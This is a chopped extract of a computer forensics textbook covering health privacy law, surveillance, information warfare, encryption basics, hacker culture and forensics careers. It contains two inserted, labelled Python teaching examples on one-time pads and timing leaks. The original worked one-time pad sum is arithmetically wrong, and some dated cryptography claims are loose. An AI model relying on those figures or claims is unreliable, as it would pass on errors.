The regulations, which were prepared by the U.S. Department of Health and Human Services (HHS), are the final version of proposed rules that were issued in 1999 after Congress failed to pass comprehensive medical privacy legislation as required by HIPAA
...
That casts a wider net than the original proposal, which applied to electronic
records and to paper ones that at some point had existed in electronic form
...
In
another change from the proposed rules, HHS indicates doctors and hospitals will be
given full discretion in determining what personal health information to include
when sending patients’ medical records to other providers for treatment purposes
...
Patients also must be given detailed written information about their privacy rights and any planned use of their personal information
...
Companies are prohibited from accessing health records for employment purposes
...
Criminal penalties of up to $250,000 and 10 years in prison
could also be targeted at individuals who try to profit from the sale of health
information
...
Nothing is more private than medical or psychiatric records, so if the government is to make freedom fully meaningful in the Information Age, when most of the
information is on some computer somewhere, then the government has to protect
the privacy of individual health records
...
HHS estimates that complying with the HIPAA rules will cost the health care
industry $40
...
In the long run, government officials claim, the regulations
will help achieve savings of almost $60 billion over the next 10 years, as a result of
related rules that eliminate paperwork by issuing standards for electronic communication of health insurance claims
...
Originally, HIPAA was intended
to apply solely to electronic communications
...
One of the problems is that HIPAA is supposed to offer specifications to cover
all privacy implementations, from one-doctor offices to giant health care organizations
...
Lessons to Learn
However, there is a whole range of institutions that must be educated on any
guidelines to be implemented, including third-party companies that offer electronic patient-record hosting or storage [4]
...
A bankrupt
company could sell its data to a company with a different privacy policy
...
The biggest resistance is fear
...
BIG BROTHER IS HERE AND IS STAYING
Workplace surveillance was the leading privacy concern in 2004, according to an
analysis recently released by the Privacy Foundation, a Denver-based nonprofit
group that performs research and educates the public on privacy issues
...
Three-fourths of major U.S. companies now perform some type of in-house electronic surveillance, according to the American Management Association, and 32% of all companies surveyed now monitor email
...
Dow Chemical
fired 68 employees and disciplined 679 others in 2004 for allegedly storing and
sending sexual or violent images on the company’s computers
...
, and the CIA were others that fired or disciplined employees because of alleged bad behavior
...
But pervasive or spot-check surveillance conducted through keystroke monitoring software, reviewing voice-mail
messages, and using mini video cameras will undoubtedly affect morale and labor
law, as well as employee recruitment and retention practices
...
Big Brother is here and staying, and it’s only going to get worse
...
Across Europe recently, politicians and the press were in full cry over a vast Anglo-American electronic surveillance system named Echelon
...
Echelon, said Parliament President Nicole
Fontaine, is “a violation of the fundamental rights” of European Union citizens
...
Charges cited are mostly old, well-known cases: In 1994, U.S. intelligence discovered that French companies were offering bribes to Saudi Arabia and Brazil for multibillion-dollar contracts
...
U.S. officials insisted last week that American intelligence does not steal trade secrets for U.S. firms
...
In some ways, people’s
communications have never been safer from becoming intelligence, and France is
certainly not a slouch in the industrial espionage arena
...
” Just a
few days earlier, a French intelligence report suggested the NSA helped create Microsoft to eavesdrop around the world
...
BioFusion
Buck Rogers, meet John Norseen
...
The Lockheed Martin neuroengineer hopes
to turn the “electrohypnomentalophone,” a mind-reading machine invented by
one of Buck’s buddies, from science fiction into science fact
...
The former Navy pilot coined the term bioFusion to cover his plans to
map and manipulate gray matter, leading (he hopes) to advances in medicine, national security, and entertainment
...
BioFusion would be able to convert thoughts into computer commands, predicts Norseen, by deciphering the brain’s electrical activity
...
”
The key is finding “brain prints
...
It
leaves a fingerprint
...
Just like you can find one person in a million through fingerprints, you can find one thought in a million
...
NASA, DARPA, and the Army’s National Ground Intelligence Center have all awarded small basic research contracts to Norseen, who works for Lockheed Martin’s intelligent systems division
...
Norseen’s theories are grounded in current science
...
By viewing a brain scan recorded by a magnetic resonance
imaging (MRI) machine, scientists can tell what the person was doing at the time
of the recording, for example, reading or writing
...
Applying Neuroscience Research to Antiterrorism
Norseen has submitted a research and development plan to the Pentagon, at its request, to identify a terrorist’s mental profile
...
Norseen predicts profiling by brain print will be in place
by 2009
...
Scientists have
already linked mind and machine by implanting electrodes into a paralyzed man’s
brain; he can control a computer’s cursor with his mind
...
A modified helmet could record a pilot’s brain waves
...
If the pilot misheard instructions to turn 090 degrees and was thinking
“080 degrees,” the helmet would detect the error, then inject the right number via
electromagnetic waves
...
Norseen feels he is “agnostic” on the moral ramifications, that he’s not a mad scientist—just a dedicated one
...
SUMMARY
This chapter has considered the application of civilian information operations
(CIOs) to the conventional warfare environment
...
Accordingly, the introduction of a CIO capability into an existing military force requires careful consideration and adherence to a series of principles espoused within
this chapter
...
This framework can be applied to both the introduction of a CIO capability and the application of CIOs in information warfare
...
However, CIOs can be applied to today’s conventional environment, and it is within this context that more urgent attention from
military planners is required
...
They may be
used to strike enemy systems, control the overall information environment, deter
enemy aggression, or support either themselves or other military strategies
...
Conclusions
Information warfare (IW) is the latest development in a long list of revolutions
in military affairs based on new technology (other examples include the introduction of airplanes, the atom bomb, and long-range missiles)
...
Information systems are so critical to military operations that it is often more
effective to attack an opponent’s information systems than to concentrate on
destroying its military forces directly
...
Because these systems rely on each other, a serious disruption in any
one system will cascade quickly through the other systems, potentially causing
a national security crisis
...
In addition to outages caused by natural disasters and accidents, these systems present a tempting target for IW attack to those contemplating an action against U.S. interests
...
The ethical questions about IW are not meant to be a complete set of ethical questions, but rather a subjective assessment of the ethical questions derived from the most important issues exposed by IW
...
It is hoped that this research will begin a dialog on the issues and lay a framework for more substantive work by ethicists
...
The threat of IW raises the following ethical challenges: (1) What constitutes an
act of war in the Information Age? (2) What are the ethical implications of the
blurring distinction between acts of war, acts of espionage, and acts of terrorism? (3) Can IW be considered nonlethal? (4) Is it ethical to set expectations for
a “bloodless war” based on IW? (5) Is it ethically correct to respond to IW tactics with IW tactics? (6) Can protection from IW take place in the United
States, given our democratic freedoms?
An Agenda for Action
Three policy questions dominate the issue of critical infrastructure protection for
civilian casualties of IW: how limited should the government’s role be, what is adequate infrastructure security and how will appropriate standards be determined,
and what data does the government need from business and why? None seems fundamentally settled, if only because policy continues to develop
...
Nonetheless, a few basic principles are emerging that
should guide infrastructure protection efforts
...
Action steps should include, but not be limited to, the 10 areas shown in Table F19
...
Finally, let’s move on to the real interactive part of this chapter: review
questions and exercises, hands-on projects, case projects, and optional team case
project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
Electric power system
B
...
Web site
D
...
Transportation
2
...
The incident must not be well defined
...
The identity of the perpetrator must be unambiguous
...
The will and ability to carry out a deterrence strike must be believed
...
The perpetrator must have something of value at stake
...
The deterrence strike must be controllable
...
In what has been called the “complex-system issue,” the following are axioms,
except:
A
...
B
...
C
...
D
...
4
...
The resort to force must have a just cause
...
It must be authorized by a competent authority
...
It is expected to produce a preponderance of evil over good
...
It must have a reasonable chance of success
...
It must be a last resort
...
By changing perspectives from defense to offense, the following are in the U.S. arsenal to wage IW against an adversary, except:
A
...
Sniffing or “wiretapping” software (enabling the capture of an adversary’s
communications)
C
...
Directed non-energy weapons (designed to destroy electronics, not humans and buildings)
E
...
The company has been conducting internal
investigations since the late 1990s, but they needed to ensure that they had the
proper processes in place to meet federal requirements regarding rules of evidence
...
Founded in 1906, the
firm is a leader in innovative legal services—overseeing the functionality and maintenance of approximately 1,800 machines on a daily basis
...
These
areas may also overlap during an investigation
...
How would a CFS go about conducting an investigation under these circumstances?
Case Project
An incident was discovered by a global pharmaceutical and medical manufacturing
company that caused major concerns
...
This manager was a 20-year veteran who had an impeccable employee
record, and prior to this incident the employee’s behavior had never been in question
...
It
was very important to be able to respond quickly to resolve the potential situation,
and to be discreet, in order to protect the manager’s privacy and good reputation
...
A product manufacturer (client) alleged that a former employee removed
files containing corporate secrets from their computer systems and then used these
secrets as the basis for establishing a new company, making a competitive product
line, and marketing to the client’s customer base
...
How was the CFS able to go about conducting the investigation?
REFERENCES
[1] Vacca, John R
...
[2] Vacca, John R
...
[3] Vacca, John R
...
[4] Vacca, John R
...
[5] Vacca, John R
...
[6] Cypel, Sylvain, “How the United States Spies on You,” Le Monde, March 5, 2002
...
20
Advanced Computer Forensics
The rise of the so-called information economy, borne along by proliferating computers, sprawling telecommunications, and the Internet, has radically transformed how people do business, govern, entertain themselves, and converse with friends and family
...
The very things that allow such speed and ease of communication have also
made it far more difficult to ensure one’s privacy [1]
...
Mounting concern over the new threats to privacy
and security has led to widespread adoption of cryptography
...
Over the past two decades, individuals and businesses alike have embraced the
technology, using it for everything from sending email and storing medical records
and legal contracts to conducting online transactions
...
If ordinary individuals can now encrypt a message in all but unbreakable form,
then so can criminals, terrorists, and other troublemakers
...
In the past, armed (or not) with a court warrant, police could
readily get at hidden documents by, for example, forcing a safe, but physical force
is of no use in decoding computer-encrypted data
...
Repressive regimes fear that dissident groups will use encryption to promote their subversive ideas
...
Indeed, the U.S. government once categorized encryption technology as a controlled munition, on a par with nuclear weapons, and until very recently it banned the export of the most advanced encryption products
...
The ensuing battle over
encryption has taken on several dimensions—technical, legal, ethical, and social
...
With the rise of hard-to-crack encryption, sensitive data is easier to protect—
and criminal activity tougher to monitor
...
ADVANCED ENCRYPTION: THE NEED TO CONCEAL
On German television several years ago, a stunned audience looked on as an unsuspecting Web surfer had his computer scanned while he was visiting a site
...
The vulnerability of computer data affects everyone
...
Even computer data that the user
may believe to be deleted or overwritten can be retrieved
...
In these cases, possession is not
nine-tenths of the law
...
The purpose of encryption is to render a document unreadable by all except
those authorized to read it
...
The key is a randomly selected string of numbers; generally speaking, the
longer the string, the stronger the security
...
One precomputer method is the conceptually simple,
yet very strong, encryption scheme known as the one-time pad, developed in 1926
by Gilbert S
...
The term “unbreakable encryption” is somewhat misleading
...
Tactical data, for example, often requires encryption that takes
only slightly longer to break than the useful life of that data
...
COMPUTER-FREE ENCRYPTION
The durable encrypting scheme known as the one-time pad gets its name from the
use of a key once and once only for just one message
...
These numbers become the key
...
Next, she encodes the plaintext word “hello,” which, in accordance with the preceding sequential numbering of the letters, corresponds to the sequence 08, 05, 12,
12, 15
...
In other words,
H E L L O
08 05 12 12 15
+ 56 34 01 92 27
______________
= 54 39 13 04 32
This last sequence (54, 39, 13, 04, 32) is the ciphertext, which gets sent to Wolfgang, the intended recipient
...
Wolfgang has an exact copy of the key (56, 34, and so on)
...
The result is not truly random: computers’ pseudorandom number generators use only 16 (or, in some cases, 32) bits to store their values
...
One remedy is to
tweak the pseudorandom number generator by applying an external physical
process to generate noise—maybe a sufficiently amplified semiconductor junction
of 1/f noise—but that further requires removing the influence of predictable external influences, such as 50–60-Hz noise
...
To escape cryptanalytic attacks involving statistical
analyses, the key must be used only once
...
The sender and the recipient, therefore, need a totally secure opportunity to exchange the key, which is hard to come by
when the two are far apart
...
Alternatively, a fake key could be designed to yield
a plausible-looking, but still false, document, thereby fooling people into believing
they have cracked the code [2]
...
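As an added illustration (not part of the original text), the following Python code carries the page's one-time pad arithmetic through in full: letters are numbered A=01 to Z=26, each plaintext group is added to the corresponding key group modulo 100, and decryption subtracts the key again. It also demonstrates two properties the text states: reusing a key leaks the difference between two plaintexts regardless of the key, and a decoy key can be constructed that decrypts a given ciphertext to any chosen message of the same length. The key groups 56, 34, 01, 92, 27 are the page's; the function names are this example's own. Note that addition modulo 100 gives 64 and 42 for the first and last groups, whereas the page's hand-worked sum shows 54 and 32; the middle three groups agree.

```python
import secrets

# Letter encoding used in the text: A=01 ... Z=26, one two-digit group per letter.
def letters_to_groups(word):
    return [ord(c) - ord("A") + 1 for c in word.upper() if c.isalpha()]

def groups_to_letters(groups):
    return "".join(chr(ord("A") + g - 1) for g in groups)

def generate_key(n):
    # Each key group is a two-digit number. secrets draws from the OS entropy
    # pool rather than a short-state PRNG, which is the weakness the text warns about.
    return [secrets.randbelow(100) for _ in range(n)]

def otp_encrypt(plain_groups, key):
    if len(key) < len(plain_groups):
        raise ValueError("one-time pad key must be at least as long as the message")
    # Group-wise addition modulo 100, so 12 + 92 = 104 becomes 04 as in the text.
    return [(p + k) % 100 for p, k in zip(plain_groups, key)]

def otp_decrypt(cipher_groups, key):
    return [(c - k) % 100 for c, k in zip(cipher_groups, key)]

def key_reuse_leak(cipher_a, cipher_b):
    # With the same key on two messages, c_a - c_b = p_a - p_b: the key cancels
    # and the relationship between the plaintexts is exposed without any key.
    return [(a - b) % 100 for a, b in zip(cipher_a, cipher_b)]

def fake_key(cipher_groups, desired_plain_groups):
    # For any ciphertext and any equal-length "plaintext" a key exists that links
    # them; this is the decoy-key property described in the text.
    return [(c - p) % 100 for c, p in zip(cipher_groups, desired_plain_groups)]

PAGE_KEY = [56, 34, 1, 92, 27]   # the key groups from the worked example on the page

if __name__ == "__main__":
    plain = letters_to_groups("hello")
    cipher = otp_encrypt(plain, PAGE_KEY)
    print("ciphertext", cipher)
    print("decrypted", groups_to_letters(otp_decrypt(cipher, PAGE_KEY)))
    decoy = fake_key(cipher, letters_to_groups("WORLD"))
    print("with decoy key", groups_to_letters(otp_decrypt(cipher, decoy)))
```

Run stand-alone it prints the ciphertext for HELLO under the page's key, the round trip, and the same ciphertext "decrypted" to WORLD with a decoy key, which is why a seized ciphertext alone proves nothing about the plaintext.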
Advanced Computer Forensics
Many of the encryption schemes
available today are also symmetric, most notably the Data Encryption Standard, or
DES (see sidebar, “A Menu of Symmetric Encryption Algorithms”)
...
Here are the most popular
...
TRIPLE DES
Encrypting the already DES-encrypted output a second time with a different key provides no measurable security, but adding a third round of DES encryption yields a highly secure, albeit slower, algorithm
...
THE INTERNATIONAL DATA ENCRYPTION ALGORITHM
The international data encryption algorithm (IDEA) uses a 128-bit key developed by
ETH Zurich, in Switzerland
...
of Bern, Switzerland, but noncommercial use is free
...
It is used in Pretty Good Privacy (PGP) and Speak Freely (a program that allows an encrypted digitized voice to
be sent over the Internet)
...
Developed in 1993
by Bruce Schneier of Counterpane Internet Security Inc
...
TWOFISH
Twofish, also developed by Schneier, is reputedly very strong, and, as one of five candidates for AES, is now being extensively reviewed by cryptanalysts
...
, Bedford, Massachusetts
...
Developed in the 1970s, DES is still popular, especially in the banking industry
...
The alternative, known as stream ciphers, encodes the stream of data sequentially without segmenting it into blocks
...
Currently,
AES has already replaced DES in many organizations worldwide
...
Unlike DES, however, it
will be competing with other algorithms—algorithms that will not suffer from any
suspicion that the U.S. government has a back door into the code
...
This is clearly undesirable because the encrypted output betrays important information about the plaintext
...
Another problem with symmetric key encryption is that it requires that the
sender and recipient of a message have a secure means for exchanging the encryption key
...
Repeated use of the same key creates its own security weakness
...
Their public key encryption scheme, first described in IEEE
Transactions on Information Theory, allows the recipient to verify that the sender is
who he or she appears to be and that the message has not been tampered with
...
Each directs his or her copy of the
software to create a key, or rather, a pair of keys
...
Bob makes known (by email, by posting to a Web site, or however else he
chooses) one of the keys of his pair; this becomes his public key
...
Each retains under tight control the other key in the pair, which is now his or
her private key
...
1) [2]
...
In effect, Bob and Alice can now exchange encrypted
files in the absence of a secure means to exchange keys, a major advantage over
symmetric encryption
...
[Figure 20.1 diagram (not recoverable from the extract). Labels: panel 1 shows Bob and Alice, each with a Public Key and a Private Key, Plaintext, Encrypt, Ciphertext, Decrypt; panel 2 adds an Imposter with Ciphertext, Decrypt, Plaintext.]
FIGURE 20
...
This scheme allows encrypted files to be
sent in the absence of a secure means to exchange keys, a major improvement over
symmetric encryption
...
Suppose Bob sends a message to the world after encrypting it with his private key
...
Message authentication, the validation that the message received is an unaltered copy of the message sent, is also easy: Before encrypting an outgoing message,
Bob performs a cryptographic hash function on it, which amounts to an elaborate
version of a checksum
...
It is extremely difficult to alter the plaintext message without altering the hash value (Figure 20
...
The widely used hash function MD5, developed by Rivest in 1991, hashes a file
of arbitrary length into a 128-bit value
...
Public-key encryption has been a part of every Web browser for the past few
years
...
One drawback of public key encryption is that it is more computationally intensive than symmetric encryption
...
FIGURE 20.2 Public key encryption allows Alice to verify that a message from Bob
actually came from him and that it is unaltered from the original
...
Alice then decodes the received ciphertext using her
own (orange) private key, decodes the hash value using Bob’s public key, thereby
confirming the sender’s authenticity, and compares the decrypted hash value with one
that she calculates locally on the just decrypted plaintext, thereby confirming the
message’s integrity
...
The differently encrypted
plaintext and key are then both sent to the recipient
...
Realistically, though, the public key
should be even longer than that, because the same public and private key pair is
used to protect all messages to the same recipient
...
To be sure, cracking an encryption key is just one way to get at sensitive data (see sidebar, “Human and Hardware Frailties”)
...
Often, the real weaknesses in security lie in the human
tendency to cut corners
...
Windows-based computers and many software products, in their quest to
be user-friendly, often leave extensive electronic trails across the hard drive
...
Furthermore, unless each file is encrypted using a different key or a different
encryption method, an attacker who can somehow read one encrypted file from or to a
given person can probably also read many other encrypted files from or to that person
...
In 1995, the so-called timing attack became popular
...
Public key encryption algorithms such as RSA and Diffie-Hellman are open to such
attacks
...
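An added example (not from the page) of the mechanism behind the timing attack mentioned above: a straightforward square-and-multiply modular exponentiation, the core of RSA and Diffie-Hellman, does an extra multiplication for every 1 bit of the exponent, so its running time correlates with the bits of the private exponent. The functions below return an operation count instead of reading a clock, which makes the effect deterministic; the second routine, a Montgomery ladder, performs the same two multiplications per bit whatever the bit's value, which is the kind of constant-work structure (combined with blinding) that hardened implementations use. The modulus 3233 with exponents 17 and 2753 is the classic small teaching key pair and is this example's own choice.

```python
def square_and_multiply(base, exponent, modulus):
    """Left-to-right binary exponentiation. Returns (result, multiplications).
    The count is bits(exponent) + popcount(exponent): it depends on the key's bits."""
    result, ops = 1, 0
    for bit in bin(exponent)[2:]:
        result = result * result % modulus          # square for every bit
        ops += 1
        if bit == "1":
            result = result * base % modulus        # extra multiply only on a 1 bit
            ops += 1
    return result, ops

def montgomery_ladder(base, exponent, modulus):
    """Same result, exactly two multiplications per exponent bit regardless of its value,
    so the operation count reveals only the exponent's length."""
    r0, r1, ops = 1, base % modulus, 0
    for bit in bin(exponent)[2:]:
        if bit == "1":
            r0, r1 = r0 * r1 % modulus, r1 * r1 % modulus
        else:
            r1, r0 = r0 * r1 % modulus, r0 * r0 % modulus
        ops += 2
    return r0, ops

def work_profile(exponents, modulus, base=65):
    """Operation counts for a list of candidate exponents under each method, as a
    defender would tabulate them when reviewing an implementation for data-dependent work."""
    return {
        e: (square_and_multiply(base, e, modulus)[1], montgomery_ladder(base, e, modulus)[1])
        for e in exponents
    }

if __name__ == "__main__":
    N, E, D = 3233, 17, 2753     # toy RSA key: p = 61, q = 53
    print(square_and_multiply(65, E, N))              # (2790, 7)
    print(square_and_multiply(2790, D, N))            # (65, 20)
    print(work_profile([17, 31, 2753], N))
```

In the profile, 17 (10001 in binary) and 31 (11111) are both five-bit exponents, yet the naive routine needs 7 and 10 operations respectively while the ladder needs 10 for either; a timing measurement of the naive version therefore narrows down the private exponent, which is why library code for these algorithms is written to avoid key-dependent branches.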
It is also possible to assess the electronic paper trail left behind when
the hardware is made to fail in the course of an encryption or decryption
...
Unfortunately, these schemes are
often implemented as an afterthought by engineers who may be very competent in
their respective fields but have minimal experience in cryptography
...
In general, however, “proprietary,” “secret,” or “revolutionary” schemes
that have not withstood the scrutiny of cryptanalysts over time are to be avoided
...
If the software proudly informs the user that this is the wrong key,
that encryption method should be discarded
...
The cryptanalyst would
merely have to keep trying different keys until the software identified the correct
one
...
Given the preceding, the odds favor the
person attacking an encrypted file, unless the person being attacked is very knowledgeable in the ways of information security [2]
...
1)
...
One of the most commonly used public key algorithms is the 24-year-old RSA,
named for its creators, Ronald Rivest, Adi Shamir, and Leonard Adleman of the
Massachusetts Institute of Technology, Cambridge
...
At present, a key length of at least 1,024
bits is generally held secure enough
...
The Diffie-Hellman public key algorithm is used mostly for exchanging
keys
...
The algorithm is generally viewed as secure if long enough keys and proper key generators are used
...
PGP was created in 1991 by a programmer and activist named Philip Zimmermann as a means of protecting email
...
The
case against him was eventually dropped in 1996, after which Zimmermann started
a company to market PGP
...
, of Santa Clara, California, although freeware versions continue to be available from the Internet
...
At issue is
whether, and to what extent, persons and organizations should have the ability to
encrypt information that the state cannot decipher
...
The international group Human Rights Watch, for example, regularly encrypts eye-witness
reports of serious abuse, gathered in parts of the globe where the victims may be
subject to further reprisals
...
In an effort to keep encryption from gaining ground, many countries have passed laws criminalizing its import, export, and use
...
The proliferation of encryption has coincided with the explosive growth of the
Internet
...
In essence, the simultaneous spread of
encryption and the Internet has amounted to a transfer of power to the individual
...
An interesting case is the People’s Republic of China
...
Repeated attempts by the authorities to shut down the group have largely
failed
...
It further banned the sale of foreign-designed encryption products
...
China’s unwavering opposition to encryption suggests a more fundamental
reason why a government (any government) would want to control the technology:
to preserve the ability to exercise censorship
...
Conversely, when citizens can communicate freely and privately using
encryption, censorship becomes unenforceable
...
It’s like having two rude guests at one’s dinner table who keep
whispering in each other’s ears
...
Until 1996,
strong encryption technology was listed as a munition, and until just recently, it fell
under the same export restrictions as advanced weaponry
...
Even so, every encryption product must
still undergo a one-time review by the U.S. Commerce Department’s Bureau of Export Administration before it can be exported; sales to the so-called terrorist five
(Cuba, Iran, North Korea, Sudan, and Syria) are still excluded
...
What’s more (although encryption proponents have largely welcomed the relaxation of export rules), another concern has been raised: the same legislation
would grant law enforcement new powers, such as the right to present a plaintext
in court without disclosing how it was obtained from a suspect’s encrypted files
...
Other Legal Responses
The United States is not alone in backing away from strict encryption bans
...
Generally speaking, laws pertaining to encryption are quite convoluted and rife
with exceptions and qualifications
...
The first international attempt to control encryption was made by the 17-country Coordinating Committee for Multilateral Strategic Export Controls (COCOM),
which came together in 1991 to restrict the export of items and data deemed “dangerous” if acquired by particular countries
...
One such item was Global System for Mobile Communications (GSM) cellular
telephony [3], which has two grades of encryption
...
Both grades of encryption have since been broken
...
Under the nonbinding agreement, countries agreed to restrict the export of mass-market software with keys longer than 64 bits
...
Do such encryption bans work? In a word, no
...
What’s more, sophisticated techniques for hiding data, unencrypted or not, are now readily available and
extremely hard to detect, so that prosecution of cryptography-ban violations is all
but impossible
...
In most,
though not all, countries, a sender can log onto any public computer connected to the
Internet, such as those in public libraries or Internet cafés and send encryption software anonymously to a recipient, who can also retrieve it anonymously
...
It may make sense for a country to ban the exportation of something that it
alone possesses and that could be used against it, but it makes no sense for a country to ban the export of what other nations already produce locally
...
The study, published before the latest relaxing of U.S. export laws, explains that
on average, the quality of foreign and U.S. products is comparable and that in the
face of continuing U.S. export controls on encryption products, technology and
services, some U.S. companies have financed the creation and growth of foreign
cryptographic firms
...
Nevertheless, in recent years, the war over encryption has moved beyond the
mere control of the technology itself
...
These efforts are in turn being met by ingenious new schemes for hiding and protecting information, including one’s identity
...
The consequences could be ruinous
...
4 million each
...
One of the best places for plant engineers to learn about network security (see
sidebar, “Hack Yourself Before Somebody Else Does”) with a peer in information
technology (IT) is at the Computer Security Resource Center, a Web site
(http://csrc
...
gov/) established by the National Institute of Standards and Technology (NIST)
...
More than ever, it’s vital that plant engineers work effectively with IT to identify
potential breaches, shore them up, and train everybody to be security conscious
...
In addition, you
should ensure that you only run the services you need and only open the ports
needed by your network
...
You should also set up
Windows Update notification for the server and have a backup server ready when
you need to run the update
...
The main thing is to regularly test the security yourself; then you know what to find
solutions for
...
The National Infrastructure Protection Center (http://www
...
gov/) was created by Congress to defend the nation’s
computer networks by serving as the national focal point for gathering information
on threats to critical infrastructures
...
The center issues updates
about new viruses, Internet frauds, and disruption attempts almost daily
...
Cybersecurity isn’t an exclusively local matter, however
...
The complaint alleged that Oleg Zezov and Igor
Yarimaka, residents of Kazakhstan, penetrated the computers of Bloomberg
...
Bloomberg agreed to pay, but only following a face-to-face meeting in London
...
They repeated their demands, and police arrested them the
next day
...
In view of the preceding incident, computer intrusions have more than tripled
in the past two years
...
Are We a Hacker Nation?
Shadowy, computer-wise predators slip in undetected to steal data, deface Web sites,
crash systems, or just look around
...
Yesterday’s hackers are today’s security gurus, with
more corporations counting on them for protection
...
Tools of the Trade
The Internet is filled with Web sites that offer tips and tools for the neophyte
hacker
...
The
barrier to entering the hacker world has become very low
...
Despite tighter Web security and stricter penalties for breaking into systems,
hacking attacks have more than tripled in the past two years
...
To avoid negative publicity, most
companies don’t report attacks
...
The FBI estimates that businesses worldwide lost $5
...
The risks are personal and professional: hackers can steal passwords and bank
account numbers from your home PC or grab trade secrets from your company
network
...
FUTURE THREAT: ADVANCED MALICIOUS CODE IN SOFTWARE
Malicious code embedded in software is not new; users have always run the risk of
downloading a virus or a trojan horse with shareware and games from the Net
...
Although Microsoft indicates its code was not altered (the code was compared
with previous backups) it’s possible that a criminal hacker could get into a software
manufacturer’s code and insert a trojan horse
...
Hacking also poses risks for national security—sophisticated terrorists or hostile governments could conceivably crash satellite systems, wage economic warfare
by interfering with financial transfers, or even disrupt air traffic control
...
Some hackers work for companies to secure their systems, and some contribute to security by notifying software vendors
when they spot a vulnerability
...
Building a solution is difficult,
but arguably more fulfilling, but for every hacker who swaps his black hat for a white
one, dozens of others continue to keep governments and companies on their toes
...
Bad software is being written faster than vulnerabilities
are exposed
...
Face it: hackers are not going to go away,
so it’s worthwhile to know who they are and why they do what they do
...
The truth is that computer hackers for the most part are smart, bored kids
...
People in the underground indicate that not
all hackers are true hackers
...
The first hackers, who emerged at MIT in the 1960s, were driven by a desire
to master the intricacies of computing systems and to push technology beyond its
known capabilities
...
A hacker should pass through a network without
a trace
...
Hacker purists get riled when anyone confuses them with crackers—intruders
who damage or steal data, but although some hackers are quick to claim the moral
high ground, the line between hacker and cracker is often blurred
...
The
law, of course, thinks otherwise
...
T12, a 20-year-old who admits to some questionable hacking conduct, indicates
he wouldn’t normally damage a site, but if a phone company were to illegally switch
his long-distance carrier and start billing his calls at $10 a minute, he wouldn’t hesitate to take action
...
Diablo, a teenager with the Romanian hacking group Pentaguard, indicates
that a hacker should never abuse his or her powers, but if you penetrate a server and
change the main page, nobody is hurt
...
Pentaguard has defaced more than 100 Web sites (most of them government- and military-related) and Diablo indicates that he’s careful: he never deletes or
steals data and never crashes the system
...
Signs of the Times
Hacking has definitely changed in the past 43 years
...
They say new
hackers today are often younger and less skilled than their predecessors and more
likely to focus on showy exploits than the noble pursuit of knowledge
...
Ten years ago, hackers respected information and machines and had to possess knowledge and skills to
hack
...
Script kiddies receive the bulk of hacker disdain
...
The risk here is that an unskilled hacker could release wanton mayhem in your systems
...
But script kiddies tend to disappear after a
year
...
Bigger Threats
Script kiddies may get attention, but experts agree that the most dangerous hackers are the ones who don’t make any noise: criminal hackers and cyberterrorists
...
Hacking has evolved into professional crime
...
These are people
like the Russian cracker group that siphoned $20 million from Citibank in 1994 and
the mafia boss in Amsterdam who had hackers access police files so he could keep
ahead of the law
...
Now, with so
many easy-to-use hacking tools on the Internet, criminals hardly need hackers to
do their dirty work
...
The Department of Defense indicates its systems are probed about 583,000 times a
year
...
Regardless, authorities have to
investigate every probe as a potential threat
...
A more
problematic assault would focus on utilities or satellite and phone systems
...
An attack on these systems could impede military communications
...
The Navy indicates that the source code was an
unclassified older version
...
Members of terrorist groups such
as Hezbollah have been educated in Western universities and are capable of developing such attacks in the future—such as a digital 9-11 attack
...
Despite the image of hackers as dysfunctional loners, many are drawn to hacking by the sense of community it gives
...
A hacker called Dead Addict once
described the high that comes from discovering valuable information, followed by
the low that comes from realizing you can’t do anything with it
...
He says that he once broke
into a hazardous waste firm and found pretty evil insider information that no one
was meant to see
...
Many hackers who begin as system voyeurs graduate to more serious activities
...
Most hackers are not old enough
to drive a car or vote, but they can exert power over a network
...
Life fills their time and their ethics begin to change
...
You only have three directions to go with hacking: you
can keep doing the same old tricks, you can become a real criminal cracker, or you
can use those skills wisely to build new software and create a more secure Internet
...
They lament that the public never hears
about their positive acts, such as patching a hole on their way out of a site and letting the administrator know they fixed it
...
It’s made hackers
reluctant to help them
...
These are findings about a security problem that hackers (and
researchers) post on the Net
...
The
hacking community frowns on people who don’t notify vendors, but when they do,
vendors often ignore them
...
Then they have to fix it
...
Hackers, on the other hand,
force vendors to admit their errors after they’ve hacked into their software
...
What if they
were producing cars that were this unsafe? The software they give us is not safe to
drive in cyberspace
...
Better security is in everyone’s best interest, and hackers should play a crucial role in this
...
The same thing that makes them hackers makes them valuable to employers in the future
...
The
network that can’t guard against a bored 18-year-old hacking in his or her spare
time, can’t hope to protect itself from a hostile government or tech-savvy terrorist
...
These are the data detectives who search for digital clues remaining on computers after malicious (or
black-hat) hackers have done their dirty deeds
...
It’s not only the number of crimes that’s fueling the need for these skills but
also the increasing sophistication of criminals
...
That means that both e-businesses and law enforcement
agencies are paying plenty to find experts to sift through evidence left behind at digital crime scenes
...
In a recent survey of more than
11,000 IT managers, security consultants, on average, make $20,000 more per year
than network administrators
...
9% to an average of $109,176 in 2004 (see Table 20
...
TABLE 20
...
Role                     Average salary (2004)   Increase
(row partly lost)                                ...7%
Security auditors        $110,722                +26.9%
System administrators    $108,313                +44.1%
The need for computer forensics is growing exponentially
...
An increasing number of corporations are
using computer forensics to resolve internal matters such as fraud, violations of
trade secrets, and inappropriate use of company computers
...
Most specialists
have years of programming or computer-related experience, strong analytical skills,
and the patience to invest days taking apart a computer in search of evidence
...
Other professional attributes needed to catch a thief are strong computer science fundamentals, a broad understanding of security vulnerabilities, and strong
system administration skills
...
The number and complexity of intrusions
has increased at an alarming rate
...
Experts gather this data and create an audit trail for criminal prosecutions
...
Most cunningly of all, they set traps using vulnerable computers
to lure malicious hackers into giving away themselves and their techniques
...
That’s because they’re required to document their findings in detail, and they often testify at criminal trials
...
The International Association of Computer Investigative Specialists, based in Donahue, Iowa, offers certification for computer forensics examiners
...
Such courses are helpful for IT managers or individuals who lack computer programming experience but who want to make the leap into computer forensics
...
The specialty is a tough discipline in a fast-moving industry that requires highly trained professionals dedicated to continued
learning
...
White-hat hackers at this point can only try to narrow the gap between themselves and the bad
guys—and hope that the black-hat hackers don’t get too fastidious when it comes
to leaving behind digital footprints
...
That inequity—highlighted during the Forensic Challenge, a contest of digital-sleuthing skills whose results were announced recently—underscores the costs of
cleaning up after an intruder compromises a network
...
Eventually, the members of a loose group of security experts known as the Honeynet Project, announced the winner of the Forensic Challenge
...
Each digital detective used decompilers, data recovery programs, and other
forensic tools to uncover as much information as possible
...
The winner
of the contest, Thomas Roessler, a student in mathematics at the University of Bonn
